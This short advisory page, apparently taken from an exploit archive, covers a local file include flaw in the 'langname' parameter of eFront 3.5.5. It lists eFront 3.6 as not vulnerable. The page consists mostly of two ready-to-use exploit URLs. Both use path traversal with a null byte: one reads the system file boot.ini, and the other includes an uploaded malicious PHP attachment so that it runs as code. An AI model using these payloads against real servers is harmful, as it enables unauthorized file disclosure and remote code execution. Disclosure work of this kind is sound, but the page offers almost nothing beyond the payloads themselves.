Home / os / winme

eFront 'langname' Parameter Local File Include Vul

Posted on 17 March 2010

============================================================
eFront 'langname' Parameter Local File Include Vulnerability
============================================================

Vulnerable:  	 eFront eFront 3.5.5
Not Vulnerable: 	eFront eFront 3.6

http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00
http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00 


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :

Exploits :